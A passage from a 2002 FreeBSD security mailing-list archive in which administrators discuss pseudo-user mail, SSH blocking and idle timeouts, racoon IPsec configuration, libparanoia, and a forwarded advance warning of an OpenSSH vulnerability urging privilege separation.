spammers' lists. >>>> >>He'd >> >>>>>never used or hosted netnews, and so had no need for the pseudo-user. >>>> >>But that >> >>>>>pseudo-user was there by default, and the system dutifully created a >>>> >>mailbox >> >>>>>for him/her/it when the very first spam arrived. It started growing by >>>> >>leaps >> >>>>>and bounds until it was -- I kid you not! -- several hundred megabytes >>>> >>in >> >>>>>size. At which point the partition ran out of room. >>>>> >>>>>It seems to me that pseudo-users should be non-mailable, just as a basic >>>>>security policy. Ideas for the best way to implement this in the default >>>>>install? >>>> >>>> >>> >>>Consider that the daily output includes a df output so you just need to >>>read your root email ;) >>> >>>--Larry >>> >> >>And that's a great point worthy of a reposting. While it's unfortunate that >>someone got their disk filled with junk, it's also seemingly indicative of a >>general lack of supervision on that box. The first line of defense is the >>scrutiny of the operator, not necessarily the revision of the OS. > > > Agreed and scrutiny by the operator should also be the last line of > defense. Little do many understand that an experienced sysadmin is the > best asset they can have. Unfortunately many companies and > organizations are unwilling to pay for that. > > >>One of the reasons I choose FBSD over other servers, especially M$, is >>that it's not too hard to do some reading and learn the OS; learn a couple >>of easy command line statements and see what's installed, what services are >>running, and etc Patience is a virtue, time with a browser a must, but no >>rocket science degree is needed. >> >>Perhaps this should be added to /stand/sysinstall: >> "You have just installed an operating system. Before you reboot >>your >>computer, PLEASE take some time and learn just what the thing will be >>doing while it sits in your home and/or place of business...." > > > Or hire or rent someone with the qualifications and experience to do it > right. Of course paying a lot of money doesn't guarantee that the job > will be done right. I've seen cases where high priced vendor personnel > installed insecure systems stating that the O/S comes secure > right out of the box and that no additional security "tweaking" was > required. Unfortunately these systems were quickly discovered by > spammers. The rest was history. > > Mistrust of vendor defaults is, unfortunately, the first thing one often learns heh. I guess though this is getting into off topic for this list what is really needed is better training, and the resources for that. I am not sure of the best solution here, I myswelf have written some articles and try and help where I can in that regard. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 6:10:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from imail.softnet.ro (imail.SoftNet.ro [193.231.173.29]) by hub.freebsd.org (Postfix) with ESMTP id 475A137B404 for ; Mon, 24 Jun 2002 06:10:11 -0700 (PDT) Received: from softnet.ro [80.96.141.227] by imail.softnet.ro with ESMTP (SMTPD32-7.04) id ABEB1340102; Mon, 24 Jun 2002 16:17:31 +0300 Message-ID: <3D171A40.3030400@softnet.ro> Date: Mon, 24 Jun 2002 16:10:24 +0300 From: Florin MANAILA Organization: Xforce NOC User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2.1) Gecko/20010901 X-Accept-Language: en-us MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: SSH ACL . Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Re all, Is posible to make an ACK with ipfw or something else to deny all ssh trafic even when is made on sshd that are running on port's gt 1022 ?? - something like sniffing the packets , and deny anything regarding SSH connections. Best regards, Florin MANAILA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 6:21:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from hawk.mail.pas.earthlink.net (hawk.mail.pas.earthlink.net [207.217.120.22]) by hub.freebsd.org (Postfix) with ESMTP id C716137B401 for ; Mon, 24 Jun 2002 06:21:38 -0700 (PDT) Received: from user-2iniujr.dialup.mindspring.com ([165.121.122.123] helo=earthlink.net) by hawk.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17MTmO-0005Jv-00; Mon, 24 Jun 2002 06:21:36 -0700 Message-ID: <3D171C4E.3050507@earthlink.net> Date: Mon, 24 Jun 2002 06:19:10 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Florin MANAILA Cc: freebsd-security@freebsd.org Subject: Re: SSH ACL . References: <3D171A40.3030400@softnet.ro> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Florin MANAILA wrote: > Re all, > > Is posible to make an ACK with ipfw or something else to deny all ssh > trafic even when is made on sshd that are running on port's gt 1022 ?? > - something like sniffing the packets , and deny anything regarding SSH > connections. > > Are you trying to stop users from sshing out or to not be able to ssh in past the firewall? or both? --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 8:15:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from tchpc01.tcd.ie (tchpc01.tcd.ie [134.226.10.78]) by hub.freebsd.org (Postfix) with ESMTP id C941E37B400 for ; Mon, 24 Jun 2002 08:15:34 -0700 (PDT) Received: from flipflop.tchpc.tcd.ie (hpc04.iss.tcd.ie [134.226.10.47]) by tchpc01.tcd.ie (Postfix) with ESMTP id 1F4C4356B; Mon, 24 Jun 2002 16:24:54 +0100 (IST) Received: by flipflop.tchpc.tcd.ie (Postfix, from userid 1001) id E9E7D18B; Mon, 24 Jun 2002 16:15:37 +0100 (IST) Date: Mon, 24 Jun 2002 16:15:37 +0100 From: Robert bobb Crosbie To: Noah K Sematimba Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH timeout settings Message-ID: <20020624161537.A85900@lummux.tchpc.tcd.ie> References: <20020623134155.M69114-100000@favour.one2net.co.ug> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020623134155.M69114-100000@favour.one2net.co.ug>; from ksemat@wawa.eahd.or.ug on Sun, Jun 23, 2002 at 01:42:51PM +0300 Organization: bobb Industries Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Noah K Sematimba hath declared on Sunday the 23 day of June 2002 :-: > > > The are at least two ports (blimitd and idled) that claim to enforce this > > limit - I've tried neither. > > idled actually does this very well. I thought the "client" referred to in the man page was the ssh client _program_ as against the user, that these options help to determine if a connection has gone stale or somthing, so it can be terminitaged. As against detecting if a user is idle. Granted, my interpretation, I could be wrong :) - bobb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 9:14:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from host185.dolanmedia.com (host185.dolanmedia.com [209.98.197.185]) by hub.freebsd.org (Postfix) with SMTP id 2CEBD37B40D for ; Mon, 24 Jun 2002 09:14:16 -0700 (PDT) Received: (qmail 34639 invoked by uid 0); 24 Jun 2002 16:12:36 -0000 Received: from greg.panula@dolaninformation.com by proxy with qmail-scanner-0.96 (. Clean. Processed in 1.458552 secs); 24 Jun 2002 16:12:36 -0000 X-Qmail-Scanner-Mail-From: greg.panula@dolaninformation.com via proxy X-Qmail-Scanner-Rcpt-To: cjclark@alum.mit.edu,security@freebsd.org X-Qmail-Scanner: 0.96 (No viruses found. Processed in 1.458552 secs) Received: from unknown (HELO mail.dolanmedia.com) (10.1.1.23) by host185.dolanmedia.com with SMTP; 24 Jun 2002 16:12:34 -0000 Received: from dolaninformation.com (10.1.1.135) by mail.dolanmedia.com (Worldmail 1.3.167); 23 Jun 2002 19:37:22 -0500 Message-ID: <3D1669C2.DF6F426A@dolaninformation.com> Date: Sun, 23 Jun 2002 19:37:22 -0500 From: Greg Panula Reply-To: greg.panula@dolaninformation.com Organization: Dolan Information Center Inc X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: security@freebsd.org Subject: Re: Configuring sainfo in racoon(8) References: <20020618130547.A11688@blossom.cjclark.org> <20020622050353.A35129@zith.net> <20020622120445.C33571@blossom.cjclark.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Crist J. Clark" wrote: > -- -- > > I want to use 'user_fqdn' because, > > 1) One end has a dynamic address so I can't specify 'sainfo' with > an address, and > > 2) I (will) have different policies for different peers so I do not > want to use an 'anonymous' 'sainfo.' > > I have no attachment to using 'user_fqdn,' it's just that I don't want > to try to use addresses since one end is dynamic, and 'user_fqdn' > seemed the obvious choice from the racoon.conf(5) docs. Ok, maybe some confusion on what the sainfo part of racoon.conf really does. To best of my knowledge the sainfo part really just sets up the encryption used by ESP;algorithms & lifetime. So, using an anonymous sainfo in racoon.conf doesn't really go against your requirements. You can use the phase 1 section(remote) to allow the remote end to set the policy: 'proposal_check claim: obey' will do the trick. Just configure the sainfo anonymous to support a wide variety of algorithms and the "obey part" will take care of the lifetime setting. The rub you'll run into with dynamic addresses on the remote end is finding a matching spd(ipsec policy). Creative use of 0.0.0.0 and 'use' instead of 'require' might work but I haven't built up the gumption to try, yet. Notes about using PGPNet and ipsec might have something useful about dynamic ip addresses. Hope this helps, Greg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 11: 4:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 903C737B411 for ; Mon, 24 Jun 2002 11:03:41 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OI3fh79653 for security@freebsd.org; Mon, 24 Jun 2002 11:03:41 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 24 Jun 2002 11:03:41 -0700 (PDT) Message-Id: <200206241803.g5OI3fh79653@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 11:40:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10102.mail.yahoo.com (web10102.mail.yahoo.com [216.136.130.52]) by hub.freebsd.org (Postfix) with SMTP id 5ED1937B401 for ; Mon, 24 Jun 2002 11:40:12 -0700 (PDT) Message-ID: <20020624184011.26370.qmail@web10102.mail.yahoo.com> Received: from [192.128.133.68] by web10102.mail.yahoo.com via HTTP; Mon, 24 Jun 2002 11:40:11 PDT Date: Mon, 24 Jun 2002 11:40:11 -0700 (PDT) From: twig les Subject: Re: SSH timeout settings To: Robert bobb Crosbie , Noah K Sematimba Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020624161537.A85900@lummux.tchpc.tcd.ie> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm stuck in two days of meetings right now without access to any BSD (must...stay...sane...). Does anyone know a url of the man pages for idled and blimitd? I've tried two sites that have FreeBSD man pages online but to no avail. Thnx again. If I make it home alive I'll post a solution that works with this (assuming I get one baked). --- Robert bobb Crosbie wrote: > Noah K Sematimba hath declared on Sunday the 23 day > of June 2002 :-: > > > > > The are at least two ports (blimitd and idled) > that claim to enforce this > > > limit - I've tried neither. > > > > idled actually does this very well. > > > I thought the "client" referred to in the man page > was the ssh client > _program_ as against the user, that these options > help to determine > if a connection has gone stale or somthing, so it > can be terminitaged. > As against detecting if a user is idle. > > Granted, my interpretation, I could be wrong :) > > > - bobb > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 12: 4:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from probsd.ws (ilm26-7-034.ec.rr.com [66.26.7.34]) by hub.freebsd.org (Postfix) with ESMTP id C91C437B401; Mon, 24 Jun 2002 12:04:33 -0700 (PDT) Received: from probsd.ws (probsd.ws [192.168.1.4]) by probsd.ws (8.12.4/8.12.4) with SMTP id g5OJ6CBT038649; Mon, 24 Jun 2002 15:06:12 -0400 (EDT) (envelope-from freebsd@ec.rr.com) Message-ID: <2600.192.168.1.4.1024945572.squirrel@webmail.probsd.ws> Date: Mon, 24 Jun 2002 15:06:12 -0400 (EDT) Subject: RE: libparanoia From: "Michael Sharp" To: , X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So, if I install libparanoia.. I would then add to any Makefile's CFLAGS arguments -lparanoia -L/usr/local/lib ? Example: /usr/ports/www/apache13/Makefile change: CFLAGS+= -O6 -fomit-frame-pointer to: CFLAGS+= -O6 -fomit-frame-pointer -lparanoia -L/usr/local/lib and apache13 would be built using /usr/local/lib/libparanoia.so ? Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 12:56:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from snafu.adept.org (snafu.adept.org [63.201.63.44]) by hub.freebsd.org (Postfix) with ESMTP id 560C837B420 for ; Mon, 24 Jun 2002 12:56:18 -0700 (PDT) Received: by snafu.adept.org (Postfix, from userid 1000) id 9E9F39EE33; Mon, 24 Jun 2002 12:56:16 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by snafu.adept.org (Postfix) with ESMTP id 9BB949B001; Mon, 24 Jun 2002 12:56:16 -0700 (PDT) Date: Mon, 24 Jun 2002 12:56:16 -0700 (PDT) From: Mike Hoskins To: twig les Cc: Robert bobb Crosbie , Noah K Sematimba , Subject: Re: SSH timeout settings In-Reply-To: <20020624184011.26370.qmail@web10102.mail.yahoo.com> Message-ID: <20020624125343.L40871-100000@snafu.adept.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, twig les wrote: > I'm stuck in two days of meetings right now without > access to any BSD (must...stay...sane...). Does > anyone know a url of the man pages for idled and > blimitd? I've tried two sites that have FreeBSD man > pages online but to no avail. mike@mojo{mike}$ cd /usr/ports/ mike@mojo{ports}$ make search key=idled Port: idled-1.16_1 Path: /usr/ports/sysutils/idled Info: A daemon that logs out idle users and those users hogging resources Maint: andrew@ugh.net.au Index: sysutils B-deps: R-deps: mike@mojo{ports}$ make search key=blimitd Port: blimitd-0.1 Path: /usr/ports/sysutils/blimitd Info: Daemon to enforce login.conf limits Maint: andrew@ugh.net.au Index: sysutils B-deps: R-deps: Later, -Mike -- "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." --Benjamin Franklin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 14:36:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mighty.grot.org (mighty.grot.org [204.182.56.120]) by hub.freebsd.org (Postfix) with ESMTP id 2E7C537B405 for ; Mon, 24 Jun 2002 14:36:01 -0700 (PDT) Received: by mighty.grot.org (Postfix, from userid 515) id F2E515D1C; Mon, 24 Jun 2002 14:35:54 -0700 (PDT) Received: by mighty.grot.org (Postfix) id EA6825E4C; Mon, 24 Jun 2002 14:20:59 -0700 (PDT) Received: from helium.my-fortress.com (helium.my-fortress.com [202.14.182.252]) by mighty.grot.org (Postfix) with ESMTP id E60B05D1C for ; Mon, 24 Jun 2002 14:20:57 -0700 (PDT) Received: from shitei.mindrot.org (shitei.mindrot.org [203.36.198.97]) by helium.my-fortress.com (Postfix) with ESMTP id BC945131BC9; Tue, 25 Jun 2002 07:15:11 +1000 (EST) Received: from shitei.mindrot.org (localhost.mindrot.org [127.0.0.1]) by shitei.mindrot.org (Postfix) with ESMTP id 69AE0E906; Tue, 25 Jun 2002 07:07:43 +1000 (EST) Received: from faui02.informatik.uni-erlangen.de (faui02.informatik.uni-erlangen.de [131.188.30.102]) by shitei.mindrot.org (Postfix) with ESMTP id B4212E881; Tue, 25 Jun 2002 07:06:31 +1000 (EST) Received: (from msfriedl@localhost) by faui02.informatik.uni-erlangen.de (8.9.1/8.1.16-FAU) id XAA22647; Mon, 24 Jun 2002 23:06:32 +0200 (MEST) From: Markus Friedl To: openssh-unix-announce@mindrot.org, openssh-unix-dev@mindrot.org Message-ID: <20020624210631.GF24956@faui02> References: <200206242100.g5OL0BLL019128@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206242100.g5OL0BLL019128@cvs.openbsd.org> User-Agent: Mutt/1.4i Subject: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability X-BeenThere: openssh-unix-announce@mindrot.org X-Mailman-Version: 2.0.8 Reply-To: openssh@openssh.com List-Help: List-Post: List-Subscribe: , List-Id: Announcements of OpenSSH releases List-Unsubscribe: , List-Archive: Date: Mon, 24 Jun 2002 23:06:31 +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 03:00:10PM -0600, Theo de Raadt wrote: > Date: Mon, 24 Jun 2002 15:00:10 -0600 > From: Theo de Raadt > Subject: Upcoming OpenSSH vulnerability > To: bugtraq@securityfocus.com > Cc: announce@openbsd.org > Cc: dsi@iss.net > Cc: misc@openbsd.org > > There is an upcoming OpenSSH vulnerability that we're working on with > ISS. Details will be published early next week. > > However, I can say that when OpenSSH's sshd(8) is running with priv > seperation, the bug cannot be exploited. > > OpenSSH 3.3p was released a few days ago, with various improvements > but in particular, it significantly improves the Linux and Solaris > support for priv sep. However, it is not yet perfect. Compression is > disabled on some systems, and the many varieties of PAM are causing > major headaches. > > However, everyone should update to OpenSSH 3.3 immediately, and enable > priv seperation in their ssh daemons, by setting this in your > /etc/ssh/sshd_config file: > > UsePrivilegeSeparation yes > > Depending on what your system is, privsep may break some ssh > functionality. However, with privsep turned on, you are immune from > at least one remote hole. Understand? > > 3.3 does not contain a fix for this upcoming bug. > > If priv seperation does not work on your operating system, you need to > work with your vendor so that we get patches to make it work on your > system. Our developers are swamped enough without trying to support > the myriad of PAM and other issues which exist in various systems. > You must call on your vendors to help us. > > Basically, OpenSSH sshd(8) is something like 27000 lines of code. A > lot of that runs as root. But when UsePrivilegeSeparation is enabled, > the daemon splits into two parts. A part containing about 2500 lines > of code remains as root, and the rest of the code is shoved into a > chroot-jail without any privs. This makes the daemon less vulnerable > to attack. > > We've been trying to warn vendors about 3.3 and the need for privsep, > but they really have not heeded our call for assistance. They have > basically ignored us. Some, like Alan Cox, even went further stating > that privsep was not being worked on because "Nobody provided any info > which proves the problem, and many people dont trust you theo" and > suggested I "might be feeding everyone a trojan" (I think I'll publish > that letter -- it is just so funny). HP's representative was > downright rude, but that is OK because Compaq is retiring him. Except > for Solar Designer, I think none of them has helped the OpenSSH > portable developers make privsep work better on their systems. > Apparently Solar Designer is the only person who understands the need > for this stuff. > > So, if vendors would JUMP and get it working better, and send us > patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday > which supports these systems better. So send patches by Thursday > night please. Then on Tuesday or Wednesday the complete bug report > with patches (and exploits soon after I am sure) will hit BUGTRAQ. > > Let me repeat: even if the bug exists in a privsep'd sshd, it is not > exploitable. Clearly we cannot yet publish what the bug is, or > provide anyone with the real patch, but we can try to get maximum > deployement of privsep, and therefore make it hurt less when the > problem is published. > > So please push your vendor to get us maximally working privsep patches > as soon as possible! > > We've given most vendors since Friday last week until Thursday to get > privsep working well for you so that when the announcement comes out > next week their customers are immunized. That is nearly a full week > (but they have already wasted a weekend and a Monday). Really I think > this is the best we can hope to do (this thing will eventually leak, > at which point the details will be published). > > Customers can judge their vendors by how they respond to this issue. > > OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. > On OpenBSD privsep works flawlessly, and I have reports that is also > true on NetBSD. All other systems appear to have minor or major > weaknesses when this code is running. > > (securityfocus postmaster; please post this through immediately, since > i have bcc'd over 30 other places..) _______________________________________________ openssh-unix-announce@mindrot.org mailing list http://www.mindrot.org/mailman/listinfo/openssh-unix-announce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 14:55: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (bluenugget.net [64.32.175.43]) by hub.freebsd.org (Postfix) with ESMTP id EA29337B40A for ; Mon, 24 Jun 2002 14:54:48 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by bluenugget.net (Postfix) with ESMTP id CB5D81371D for ; Mon, 24 Jun 2002 14:56:09 -0700 (PDT) Date: Mon, 24 Jun 2002 14:54:39 -0700 From: Jason DiCioccio Reply-To: Jason DiCioccio To: freebsd-security@freebsd.org Subject: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <2147483647.1024930479@[192.168.4.154]> X-Mailer: Mulberry/3.0.0a2 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ---------- Forwarded Message ---------- Date: Monday, June 24, 2002 11:06 PM +0200 From: Markus Friedl To: openssh-unix-announce@mindrot.org, openssh-unix-dev@mindrot.org Subject: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability On Mon, Jun 24, 2002 at 03:00:10PM -0600, Theo de Raadt wrote: > Date: Mon, 24 Jun 2002 15:00:10 -0600 > From: Theo de Raadt > Subject: Upcoming OpenSSH vulnerability > To: bugtraq@securityfocus.com > Cc: announce@openbsd.org > Cc: dsi@iss.net > Cc: misc@openbsd.org > > There is an upcoming OpenSSH vulnerability that we're working on with > ISS. Details will be published early next week. > > However, I can say that when OpenSSH's sshd(8) is running with priv > seperation, the bug cannot be exploited. > > OpenSSH 3.3p was released a few days ago, with various improvements > but in particular, it significantly improves the Linux and Solaris > support for priv sep. However, it is not yet perfect. Compression is > disabled on some systems, and the many varieties of PAM are causing > major headaches. > > However, everyone should update to OpenSSH 3.3 immediately, and enable > priv seperation in their ssh daemons, by setting this in your > /etc/ssh/sshd_config file: > [...] > > OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. > On OpenBSD privsep works flawlessly, and I have reports that is also > true on NetBSD. All other systems appear to have minor or major > weaknesses when this code is running. I know theo did not mention FreeBSD, but does anyone know for sure if FreeBSD is one of the platforms with major/minor weaknesses in the privsep code? And if it is major, or minor? ;-) Cheers, -JD- -- Jason DiCioccio - jd@bluenugget.net - Useless .sig Open Domain Service - geniusj@ods.org - http://www.ods.org/ Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 14:57:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 666C337B406 for ; Mon, 24 Jun 2002 14:57:18 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 08CED243C2 for ; Mon, 24 Jun 2002 16:57:17 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id 124ED243BE for ; Mon, 24 Jun 2002 16:57:15 -0500 (CDT) Message-Id: <5.1.1.6.2.20020624164701.041d6ec0@pop3s.schulte.org> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Mon, 24 Jun 2002 16:54:40 -0500 To: freebsd-security@freebsd.org From: Christopher Schulte Subject: Upcoming OpenSSH vulnerability *unverified* Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Any of you folk seen this yet? http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=102495293705094&q=raw 'There is an upcoming OpenSSH vulnerability that we're working on with ISS. Details will be published early next week.' I don't know the legitimacy of the info, but... offtopic: If this is legit, why is ISS working with the OpenBSD and OpenSSH people, after giving Apache such a run last week? Curious. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:19: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (pool-138-88-108-190.res.east.verizon.net [138.88.108.190]) by hub.freebsd.org (Postfix) with ESMTP id 3473C37B400 for ; Mon, 24 Jun 2002 15:18:39 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g5OMIYIK000566; Mon, 24 Jun 2002 18:18:34 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g5OMIYhL000563; Mon, 24 Jun 2002 18:18:34 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Mon, 24 Jun 2002 18:18:33 -0400 (EDT) From: Matt Piechota To: Jason DiCioccio Cc: freebsd-security@FreeBSD.ORG Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <2147483647.1024930479@[192.168.4.154]> Message-ID: <20020624181545.C550-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Jason DiCioccio wrote: > > OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. > > On OpenBSD privsep works flawlessly, and I have reports that is also > > true on NetBSD. All other systems appear to have minor or major > > weaknesses when this code is running. > > I know theo did not mention FreeBSD, but does anyone know for sure if > FreeBSD is one of the platforms with major/minor weaknesses in the privsep > code? And if it is major, or minor? ;-) And better yet, is this a 3.x bug, or does it affect 2.whatever that is in the base 4.x-STABLE? Hopefully someone that is 'in' on the bug can give us a hint without giving away too much before the patch, at least so we can prepare to patch and rebuild. Does this reset OpenBSD's 4-years without a root hole? :) -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:21: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (pool-138-88-108-190.res.east.verizon.net [138.88.108.190]) by hub.freebsd.org (Postfix) with ESMTP id 8166E37B401 for ; Mon, 24 Jun 2002 15:20:11 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g5OMKAIK000584; Mon, 24 Jun 2002 18:20:10 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g5OMKAOY000581; Mon, 24 Jun 2002 18:20:10 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Mon, 24 Jun 2002 18:20:10 -0400 (EDT) From: Matt Piechota To: Christopher Schulte Cc: freebsd-security@FreeBSD.ORG Subject: Re: Upcoming OpenSSH vulnerability *unverified* In-Reply-To: 